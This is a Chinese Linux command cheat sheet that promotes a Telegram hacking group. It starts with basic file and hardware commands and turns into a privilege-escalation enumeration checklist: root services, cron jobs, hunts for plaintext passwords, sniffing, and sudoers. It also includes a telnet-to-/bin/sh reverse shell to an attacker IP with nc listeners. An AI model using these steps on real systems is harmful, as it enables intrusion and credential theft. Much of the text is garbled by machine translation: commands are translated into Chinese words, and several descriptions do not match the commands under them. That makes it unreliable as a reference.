终极 Linux 速查表

*你想成为道德黑客，并想知道黑客在现实世界中是如何攻击的吗？加入电报群，加入
我们吧！*

电报= https://t.me/infosecbugbounty

介绍

如果您不习惯使用终端，Linux 命令乍一看可能令人望而生畏。Linux 系统上有许多用于执行操作和进程的命令。

无论您是 Linux 新手还是经验丰富的用户，手边有一份常用命令列表都是有帮助的。

在本教程中，您将找到常用的 Linux 命令以及常用 Linux 命令列表
重要提示：根据您的系统设置，以下某些命令可能需要调用 sudo 才能执行

Linux 操作系统常用的所有 Linux 命令列表。Linux
命令列表

文件命令
列出目录中的文件：

ls
列出所有文件（显示隐藏文件）：

ls -a
显示您当前正在工作的目录：

pwd
创建新目录：

* rm [file_name] *
递归删除目录

rm -rf [directory_name]
删除目录

cp [file_name1] [file_name2]
递归地将一个文件的内容复制到第二个文件：

cp -r [directory_name1] [directory_name2]
使用以下命令将 [file_name1] 重命名为 [file_name2]：

mv [file_name1] [file_name2]
创建文件的符号链接：

ln -s /path/to/[file_name] [link_name]
创建一个新文件：

触摸[文件名]

硬件信息

显示启动消息：

dmesg
查看CPU信息：

cat /proc/cpuinfo
显示可用和已用内存：

free -h
列出硬件配置信息：

lshw
查看块设备的相关信息：

lsblk
以树状图显示 PCI 设备：

lspci -tv
以树状图显示 USB 设备：

lsusb -tv
从 BIOS 显示硬件信息：

dmidecode
显示磁盘数据信息：

hdparm -i /dev/disk
对设备/磁盘进行读取速度测试：

hdparm -tT /dev/[device]
测试设备/磁盘上是否存在不可读的块：

badblocks -s /dev/[设备]

操作系统发行
版类型是什么？哪个版本？

猫/etc/问题
猫/etc/*-release
猫/etc/lsb-release

内核版本是多少？是 64 位的吗？

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

从环境变量中我们可以了解到什么？

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

有打印机吗？

lpstat -a

应用程序和服务

哪些服务正在运行？哪些服务拥有哪些用户权限？

ps aux
ps -ef
top
cat /etc/services

哪些服务以 root 身份运行？这些服务中，哪些容易受到攻击？

ps aux | grep 根
ps -ef | grep 根

安装了哪些应用程序？它们是什么版本？它们当前正在运行吗？

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

是否有任何服务设置错误？是否附加了任何（易受攻击的）插件？

猫/etc/syslog.conf
猫/etc/chttp.conf
猫/etc/lighttpd.conf
猫/etc/cups/cupsd.conf
猫/etc/inetd.conf
猫/etc/apache2/apache2.conf
猫/etc/my.conf
猫/etc/httpd/conf/httpd.conf
猫/opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^. r. /

安排了哪些工作？

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat
/etc/at.deny
cat /etc/cron.allow cat /etc/cron.deny cat
/etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

有任何纯文本用户名和/或密码吗？

grep -i 用户 [文件名]
grep -i 密码 [文件名]
grep -C 5 "密码" [文件名]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

通信和网络
系统有哪些网卡？它连接到其他网络了吗？

/sbin/ifconfig -a
猫/etc/网络/接口
猫/etc/sysconfig/网络

网络配置设置是什么？你能找到关于这个网络的哪些信息？DHCP 服务器？DNS 服务器？网关？

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
主机名
dns域名

还有哪些用户和主机正在与系统通信？

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

缓存了什么？IP 地址和/或 MAC 地址

arp -e
路由
/sbin/route -nee

可以嗅探数据包吗？可以看到什么？监听实时流量

tcpdump tcp dst 192.168.1.7 80 和 tcp dst 10.5.5.252 21

注意：tcpdump tcp dst [ip] [port] 和 tcp dst [ip] [port]

你有shell吗？你能和系统交互吗？

nc -lvp 4444 # 攻击者。输入（命令）
nc -lvp 4445 # 攻击者。输出（结果）
telnet [攻击者 ip] 44444 | /bin/sh | [本地 ip] 44445 # 在目标系统上。使用攻击者的 IP！

机密信息和用户
您是谁？谁登录了？谁已经登录？还有谁？谁可以做什么？**

id
who
w
last
cat /etc/passwd | cut -d: -f1 # 用户列表
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # 超级用户列表
awk -F: '($3 == "0") {print}' /etc/passwd # 超级用户列表
cat /etc/sudoers
sudo -l